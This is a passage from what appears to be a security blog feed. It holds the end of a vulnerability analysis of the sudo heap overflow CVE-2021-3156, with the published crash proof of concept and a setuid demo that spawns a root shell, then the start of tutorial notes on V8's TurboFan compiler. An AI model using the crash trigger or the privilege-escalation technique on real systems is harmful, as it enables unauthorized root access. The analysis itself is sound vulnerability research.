class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="keyword">for</span> (;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ch = <span class="built_in">getopt_long</span>(argc, argv, short_opts, long_opts, <span class="literal">NULL</span>)) != <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">switch</span> (ch)</span><br><span class="line">            &#123;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span class="string">&#x27;e&#x27;</span>:</span><br><span class="line">                <span class="keyword">if</span> (mode &amp;&amp; mode != MODE_EDIT)</span><br><span class="line">                    <span class="built_in">usage_excl</span>();</span><br><span class="line">                <span class="comment">// set mode to MODE_EDIT</span></span><br><span class="line">                mode = MODE_EDIT;</span><br><span class="line">                sudo_settings[ARG_SUDOEDIT].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">                valid_flags = MODE_NONINTERACTIVE;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            <span class="keyword">case</span> <span 
class="string">&#x27;l&#x27;</span>:</span><br><span class="line">                <span class="keyword">if</span> (mode)</span><br><span class="line">                &#123;</span><br><span class="line">                    <span class="keyword">if</span> (mode == MODE_LIST)</span><br><span class="line">                        <span class="built_in">SET</span>(flags, MODE_LONG_LIST);</span><br><span class="line">                    <span class="keyword">else</span></span><br><span class="line">                        <span class="built_in">usage_excl</span>();</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="comment">// set mode to MODE_LIST</span></span><br><span class="line">                mode = MODE_LIST;</span><br><span class="line">                valid_flags = MODE_NONINTERACTIVE | MODE_LONG_LIST;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// ...</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// MODE_LIST is changed to MODE_CHECK here</span></span><br><span class="line">    <span class="keyword">if</span> (argc &gt; <span class="number">0</span> &amp;&amp; mode == MODE_LIST)</span><br><span class="line">        mode = MODE_CHECK;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// the check that has to be passed</span></span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; valid_flags) != flags)</span><br><span class="line">        <span class="built_in">usage</span>();</span><br><span class="line">    <span class="comment">// 
...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>There is a way out, though. If sudo is invoked as sudoedit (note that sudoedit is a symlink pointing straight at /bin/sudo), mode is set to MODE_EDIT <strong>without valid_flags being modified</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Default flags allowed when running a command.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEFAULT_VALID_FLAGS (MODE_BACKGROUND | MODE_PRESERVE_ENV | MODE_RESET_HOME | MODE_LOGIN_SHELL | MODE_NONINTERACTIVE | MODE_SHELL)</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">parse_args</span><span 
class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">int</span> *old_optind, <span class="type">int</span> *nargc, <span class="type">char</span> ***nargv,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="keyword">struct</span> sudo_settings **settingsp, <span class="type">char</span> ***env_addp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="type">int</span> valid_flags = DEFAULT_VALID_FLAGS;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">/* First, check to see if we were invoked as &quot;sudoedit&quot;. */</span></span><br><span class="line">    <span class="comment">// if invoked as sudoedit</span></span><br><span class="line">    proglen = <span class="built_in">strlen</span>(progname);</span><br><span class="line">    <span class="keyword">if</span> (proglen &gt; <span class="number">4</span> &amp;&amp; <span class="built_in">strcmp</span>(progname + proglen - <span class="number">4</span>, <span class="string">&quot;edit&quot;</span>) == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        progname = <span class="string">&quot;sudoedit&quot;</span>;</span><br><span class="line">        <span class="comment">// then set mode to MODE_EDIT</span></span><br><span class="line">        mode = MODE_EDIT;</span><br><span class="line">        <span class="comment">// note that valid_flags is not modified on this path</span></span><br><span class="line">        sudo_settings[ARG_SUDOEDIT].value = <span class="string">&quot;true&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 
...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// the check that has to be passed</span></span><br><span class="line">    <span class="keyword">if</span> ((flags &amp; valid_flags) != flags)</span><br><span class="line">        <span class="built_in">usage</span>();</span><br><span class="line">   <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The default value of valid_flags includes both MODE_SHELL and MODE_LOGIN_SHELL, so the check passes.</p><blockquote><p>So in the end we can:</p><ul><li><strong>Bypass</strong> the <strong>escaping</strong> in parse_args.</li><li><strong>Reach</strong> the <strong>unescaping</strong> in set_cmnd.</li></ul><p>And ultimately write out of bounds past the user_args heap buffer.</p></blockquote><p>This is close to an ideal bug, because:</p><ul><li><p><strong>The size of the user_args heap buffer is controllable</strong>, since it is derived from the lengths of the arguments passed to sudoedit:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// this snippet is taken from set_cmnd</span></span><br><span class="line"><span class="comment">/* Alloc and build up user_args. */</span></span><br><span class="line"><span class="keyword">for</span> (size = <span class="number">0</span>, av = NewArgv + <span class="number">1</span>; *av; av++)</span><br><span class="line">    size += <span class="built_in">strlen</span>(*av) + <span class="number">1</span>;</span><br></pre></td></tr></table></figure></li><li><p><strong>The data written out of bounds is controllable</strong>. The arguments passed to sudoedit sit immediately before the environment variables in memory, so we can choose what gets written by <strong>setting specific environment variables</strong>:</p><p><img src="/2021/01/CVE-2021-3156/args_envs.png" alt="img"></p></li><li><p><strong>A single backslash can be used to write a single NUL byte</strong>; see the trigger walkthrough above.</p></li></ul><h4 id="b-POC">b. 
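POC</h4><p>The Qualys research team published a very compact PoC that corrupts the heap and makes malloc abort.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># command</span></span><br><span class="line">sudoedit -s <span class="string">&#x27;\&#x27;</span> `perl -e <span class="string">&#x27;print &quot;A&quot; x 65536&#x27;</span>`</span><br><span class="line"><span class="comment"># program output</span></span><br><span class="line">malloc(): corrupted top size</span><br><span class="line">[1]    411260 abort      sudoedit -s <span class="string">&#x27;\&#x27;</span> `perl -e <span class="string">&#x27;print &quot;A&quot; x 65536&#x27;</span>`</span><br></pre></td></tr></table></figure><p>The PoC matches the analysis above:</p><ul><li>Invoking sudoedit sets MODE_EDIT.</li><li>The <code>-s</code> option sets MODE_SHELL.</li><li>One of the arguments that follow ends with a <strong>single backslash</strong>.</li></ul><p>That is why it triggers a crash.</p><blockquote><p>According to the exploitation details disclosed by the Qualys research team (see the second reference), there are at least three ways to build an exploit. While debugging, however, I ran into some problems:</p><ul><li><p>The first approach writes <strong>close to 0x1000 bytes</strong> out of bounds on the heap in order to overwrite a function pointer. Between <strong>the out-of-bounds write</strong> and <strong>the use of the function pointer</strong>, however, the program <strong>dereferences pointers located in the overwritten memory</strong>, which crashes it, and I found no way around this.</p></li><li><p>The second approach tries to write out of bounds into a service_user structure. In my tests the user_args heap buffer was located at a <strong>higher</strong> address than the service_user structure allocated after it, so the overflow could not reach that structure.</p><blockquote><p>This most likely depends on the glibc version; I hit the problem when testing against my own non-standard glibc.</p></blockquote></li><li><p>The third approach is harder and relies on a more intricate mechanism, so I have not looked into it yet.</p></li></ul><p>As for why the Qualys team succeeded, possibly their exploit was found by fuzzing, i.e. by searching for conditions under which sudo happens to reach the desired state (for example, the function pointer actually being used, or the target object sitting at a higher address than the user_args heap buffer).</p></blockquote><h2 id="四、小结">IV. Summary</h2><p>At its core, this vulnerability is a case of a low-privileged user breaking the protections of a high-privileged program and thereby gaining its privileges.</p><p>We can check the permissions of the sudo binary with the following command:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span 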
class="built_in">ls</span> /bin/sudo -al</span><br></pre></td></tr></table></figure><p>The output is:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-rwsr-xr-x 1 root root 161512 Oct 29  2019 /bin/sudo</span><br></pre></td></tr></table></figure><p>As shown, sudo's <strong>owner is root</strong> and its <strong>owner permissions are <code>rws</code></strong>. We all know that <code>rwx</code> means read, write, and execute, but what is rws?</p><p>The <code>s</code> flag is the <strong>setuid bit</strong>. Normally a running executable <strong>only has the privileges of the user who invoked it</strong>; with the setuid bit set, an ordinary user runs the program with the privileges of the file's owner instead.</p><blockquote><p>In the case of sudo, the owner is <strong>root</strong>.</p></blockquote><p>Therefore, if <strong>software carrying the setuid bit contains a vulnerability</strong>, we can use that vulnerability to <strong>gain higher privileges</strong>.</p><p>Here is a simple test case:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// test.c</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span 
class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setuid</span>(<span class="number">0</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;setuid fail\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">setgid</span>(<span class="number">0</span>) == <span class="number">-1</span>)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;setgid fail\n&quot;</span>);</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Run the following commands:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Currently running with ordinary user privileges</span></span><br><span class="line">g++ test.c -o <span class="built_in">test</span></span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:root ./test</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">chmod</span> 4755 ./test</span><br><span class="line">./test</span><br><span class="line"><span class="comment"># The newly spawned /bin/sh runs with root 
privileges</span></span><br></pre></td></tr></table></figure><p>In other words, when a program is owned by root and has the <code>rws</code> permission bits, calling <code>setuid(0)</code> and <code>setgid(0)</code> inside it successfully elevates the program to root.</p><p>The same reasoning applies to the sudo binary.</p><h2 id="五、参考">5. References</h2><ol><li><p><a href="https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit">CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)</a></p></li><li><p><a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt">Qualys Security Advisory - Baron Samedit: Heap-based buffer overflow in Sudo (CVE-2021-3156)</a></p></li><li><p><a href="https://www.anquanke.com/post/id/229948">CVE-2021-3156：Sudo 堆缓冲区溢出漏洞通告 - 安全客</a></p></li></ol>]]></content>
    
    
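    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;1. Preface&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;sudo&lt;/code&gt; is a critically important privilege-management program on Linux that lets users run programs with root privileges. CVE-2021-3156 is a heap overflow vulnerability in sudo. Through it, any unprivileged user can obtain root privileges under the default sudo configuration.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The vulnerability affects all legacy sudo versions from 1.8.2 through 1.8.31p2, as well as all stable versions from 1.9.0 through 1.9.5p1.&lt;/p&gt;
&lt;p&gt;The Qualys research team contacted the sudo team on &lt;code&gt;2021-01-13&lt;/code&gt; and disclosed the issue publicly on &lt;code&gt;2021-01-26&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;The principle behind this vulnerability is &lt;strong&gt;fairly simple&lt;/strong&gt;, yet it involves a high-risk operation, &lt;strong&gt;privilege escalation&lt;/strong&gt;, and its impact is broad (one of my virtual machines, a WSL instance, and an Alibaba Cloud server were all vulnerable), which makes it quite interesting. So let us take a brief look at it.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;</summary>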
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>A Brief Analysis of V8 TurboFan</title>
    <link href="https://kiprey.github.io/2021/01/v8-turboFan/"/>
    <id>https://kiprey.github.io/2021/01/v8-turboFan/</id>
    <published>2021-01-23T07:20:22.000Z</published>
    <updated>2025-11-24T03:59:40.170Z</updated>
    
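    <content type="html"><![CDATA[<h2 id="一、前言">1. Preface</h2><ul><li><p>V8 is a JavaScript engine developed by Google and written in C++.</p><p>V8 is designed to improve the performance of JavaScript execution inside web browsers. To that end, it compiles JS code into more efficient machine code rather than relying solely on a traditional interpreter. V8 therefore includes a <strong>JIT (Just-In-Time)</strong> mechanism, which dynamically compiles JS code to machine code at run time to speed up execution.</p></li><li><p>TurboFan is one of V8's optimizing compilers. It is built on the compiler concept known as the <a href="https://darksi.de/d.sea-of-nodes/">sea of nodes</a>.</p><blockquote><p>Sea of nodes does not simply refer to the nodes of some graph; it is a graph-based <strong>special intermediate representation</strong>.</p><p>Its form differs from an ordinary CFG/DFG; see the link above for details.</p></blockquote><p>The TurboFan source code lives under the <code>v8/src/compiler</code> directory.</p><span id="more"></span></li><li><p>These are the notes I wrote while first learning V8 TurboFan. They cover, among other things, the TurboFan-related command-line flags, how some of the <code>OptimizationPhases</code> work, and a write-up of the <code>GoogleCTF 2018(Final) Just-In-Time</code> challenge, which I used for practice.</p><p>The notes are <strong>based on <a href="https://doar-e.github.io/blog/2019/01/28/introduction-to-turbofan/">Introduction to TurboFan</a> and expand on parts of it</strong>. If you spot mistakes or gaps while reading, corrections are very welcome!</p></li></ul><h2 id="二、环境搭建">2. Environment Setup</h2><ul><li><p>The setup is fairly simple. First, prepare a V8 build environment (<strong>required</strong>: you cannot study V8 without one). The version used here is <strong>7.0.276.3</strong>.</p><blockquote><p>How do you set up a V8 environment? See <a href="https://kiprey.github.io/2020/11/fetch-chromium/">Fetching &amp; building the chromium &amp; v8 code</a></p></blockquote><p>One addition is needed: the V8 gn args must include the flag <code>v8_untrusted_code_mitigations = false</code>, so the final gn args look like this:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Set build arguments here. 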
See `gn help buildargs`.</span></span><br><span class="line">is_debug = true</span><br><span class="line">target_cpu = <span class="string">&quot;x64&quot;</span></span><br><span class="line">v8_enable_backtrace = true</span><br><span class="line">v8_enable_slow_dchecks = true</span><br><span class="line">v8_optimized_debug = false</span><br><span class="line"><span class="comment"># Add this line</span></span><br><span class="line">v8_untrusted_code_mitigations = false</span><br></pre></td></tr></table></figure><p>The reason is explained below, in the discussion of how <code>CheckBounds</code> nodes are optimized.</p></li><li><p>Next, install V8's turbolizer, a tool for inspecting and debugging the <code>sea of nodes</code> graph in V8 TurboFan.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> v8/tools/turbolizer</span><br><span class="line"><span class="comment"># Install dependencies</span></span><br><span class="line">npm i</span><br><span class="line"><span class="comment"># Build</span></span><br><span class="line">npm run-script build</span><br><span class="line"><span class="comment"># Start a static HTTP server in the turbolizer folder (Python 2; with Python 3 use `python3 -m http.server`)</span></span><br><span class="line">python -m SimpleHTTPServer</span><br></pre></td></tr></table></figure><blockquote><p>Building turbolizer may report some TypeScript syntax ERRORs. They are harmless and do not affect turbolizer's functionality.</p></blockquote></li><li><p>turbolizer is used as follows:</p><ul><li><p>First, write a test function</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Function to be optimized</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">b</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> values = [<span class="number">42</span>,<span class="number">1337</span>];</span><br><span class="line">    <span class="keyword">let</span> x = <span class="number">10</span>;</span><br><span class="line">    <span class="keyword">if</span> (b == <span class="string">&quot;foo&quot;</span>)</span><br><span class="line">      x = <span class="number">5</span>;</span><br><span class="line">                         </span><br><span class="line">    <span class="keyword">let</span> y = x + <span class="number">2</span>;</span><br><span class="line">    y = y + <span class="number">1000</span>;</span><br><span class="line">    y = y * <span class="number">2</span>;</span><br><span class="line">    y = y &amp; <span class="number">10</span>;</span><br><span class="line">    y = y / <span class="number">3</span>;</span><br><span class="line">    y = y &amp; <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> values[y];</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Required! Run the function once before optimizing it so that it has type feedback</span></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line"><span class="comment">// Required! 
Use V8 natives syntax to force optimization of this function</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="comment">// Required! The optimization only runs when the target function is called</span></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><blockquote><p>Be sure to call the target function once before executing <code>%OptimizeFunctionOnNextCall(opt_me)</code>. Otherwise, without type feedback, the generated graph will be <strong>completely different</strong>.</p><p>Note that type feedback can be <strong>somewhat unpredictable</strong>. If the target function performs edge-case operations (for example, repeatedly using integers larger than <code>Number.MAX_SAFE_INTEGER</code>), then the way it is called before <code>OptimizeFunctionOnNextCall</code> <strong>may</strong> affect what TurboFan does, including but not limited to which arguments are passed and how many times the function is called.</p><p>So before executing <code>%OptimizeFunctionOnNextCall</code>, you have to work out for yourself how to call the target function, confirming by hand <strong>how many calls and which arguments</strong> produce the particular optimization you want.</p></blockquote><p>Besides <code>%OptimizeFunctionOnNextCall</code>, a function can also be optimized by simply running it many times (the count must be large, so a for loop is recommended).</p></li><li><p>Then run the script with d8, adding the <code>--trace-turbo</code> flag.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$  ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax --trace-turbo   </span><br><span class="line">Concurrent recompilation has been disabled <span class="keyword">for</span> tracing.</span><br><span class="line">---------------------------------------------------</span><br><span class="line">Begin compiling method opt_me using Turbofan</span><br><span class="line">---------------------------------------------------</span><br><span class="line">Finished compiling method opt_me using 
Turbofan</span><br></pre></td></tr></table></figure><p>This generates <code>turbo.cfg</code> and <code>turbo-xxx-xx.json</code> files in the current directory.</p></li><li><p>Open <code>127.0.0.1:8000</code> in a browser (recall that we started an HTTP server in the turbolizer folder earlier)</p><p>Click button 3 in the upper-right corner and, in the file chooser, select the <code>turbo-xxx-xx.json</code> file that was just generated. The following is then displayed:</p><p><img src="/2021/01/v8-turboFan/turbolizer.png" alt="img"></p><p>Only the control nodes are shown at this point. To show every node, first click button 2 at the top to expand all nodes, then click button 1 to re-layout the graph:</p><p><img src="/2021/01/v8-turboFan/turbolizer1.png" alt="img"></p></li></ul></li></ul><h2 id="三、turboFan的代码优化">3. TurboFan Code Optimization</h2><ul><li><p>We can use the <code>--trace-opt</code> flag to trace optimization information for functions. Below is the output produced when <code>opt_me</code> is optimized by TurboFan.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax --trace-opt </span><br><span class="line">[manually marking 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; <span class="keyword">for</span> non-concurrent optimization]</span><br><span class="line">[compiling method 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; using TurboFan]</span><br><span class="line">[optimizing 0x0a7a24823759 &lt;JSFunction opt_me (sfi = 0xa7a24823591)&gt; - took 53.965, 19.410, 0.667 ms]</span><br></pre></td></tr></table></figure><blockquote><p>The <code>manually marking</code> in the output above corresponds to the <code>%OptimizeFunctionOnNextCall</code> we placed in the code by hand.</p></blockquote><p>We can use V8 natives syntax (<code>%DisassembleFunction</code>) to inspect the machine code before and after optimization.</p><blockquote><p>The output is too long, so only part of it is shown here.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">$ ../../v8/v8/out.gn/x64.debug/d8 test.js --allow-natives-syntax  </span><br><span class="line"></span><br><span class="line">0x2b59fe964c1: [Code]</span><br><span class="line"> - map: 0x05116bd02ae9 &lt;Map&gt;</span><br><span class="line">kind = BUILTIN</span><br><span class="line">name = InterpreterEntryTrampoline</span><br><span class="line">compiler = unknown</span><br><span class="line">address = 0x2b59fe964c1</span><br><span class="line"></span><br><span class="line">Instructions (size = 995)</span><br><span class="line">0x2b59fe96500     0  488b5f27       REX.W movq rbx,[rdi+0x27]</span><br><span class="line">0x2b59fe96504     4  488b5b07       REX.W movq rbx,[rbx+0x7]</span><br><span class="line">0x2b59fe96508     8  488b4b0f       REX.W movq rcx,[rbx+0xf]</span><br><span class="line">....</span><br><span class="line"></span><br><span class="line">0x2b59ff49541: [Code]</span><br><span class="line"> - map: 0x05116bd02ae9 &lt;Map&gt;</span><br><span class="line">kind = OPTIMIZED_FUNCTION</span><br><span class="line">stack_slots = 5</span><br><span class="line">compiler = turbofan</span><br><span class="line">address = 0x2b59ff49541</span><br><span class="line"></span><br><span class="line">Instructions (size = 212)</span><br><span 
class="line">0x2b59ff49580     0  488d1df9ffffff REX.W leaq rbx,[rip+0xfffffff9]</span><br><span class="line">0x2b59ff49587     7  483bd9         REX.W cmpq rbx,rcx</span><br><span class="line">0x2b59ff4958a     a  7418           jz 0x2b59ff495a4  &lt;+0x24&gt;</span><br><span class="line">0x2b59ff4958c     c  48ba000000003e000000 REX.W movq rdx,0x3e00000000</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>The code attached to the function goes from 995 bytes to 212 bytes. Note, however, that the 995-byte listing is the shared <code>InterpreterEntryTrampoline</code> builtin through which the unoptimized function is interpreted, so the two sizes are not directly comparable. What the output does show is that after optimization the function has its own TurboFan-generated machine code.</p><blockquote><p>Note that even without <code>%OptimizeFunctionOnNextCall</code>, running <code>opt_me</code> enough times will trigger TurboFan optimization as well.</p></blockquote></li><li><p>Attentive readers may have noticed <code>deoptimize</code> in the screenshots from the environment setup above. Why is deoptimization needed? The answer lies in how TurboFan optimizes. Take the following JS code as an example (note: it does not use <code>%OptimizeFunctionOnNextCall</code>)</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Player</span>&#123;&#125;</span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Wall</span>&#123;&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">move</span>(<span class="params">obj</span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> tmp = obj.<span class="property">x</span> + <span class="number">42</span>;</span><br><span 
class="line">  <span class="keyword">var</span> x = <span class="title class_">Math</span>.<span class="title function_">random</span>();</span><br><span class="line">  x += <span class="number">1</span>;</span><br><span class="line">  <span class="keyword">return</span> tmp + x;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; ++i) &#123;</span><br><span class="line">  <span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Player</span>());</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Wall</span>());</span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; ++i) &#123;</span><br><span class="line">  <span class="title function_">move</span>(<span class="keyword">new</span> <span class="title class_">Wall</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Let us trace the optimizations and deoptimizations of this code:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
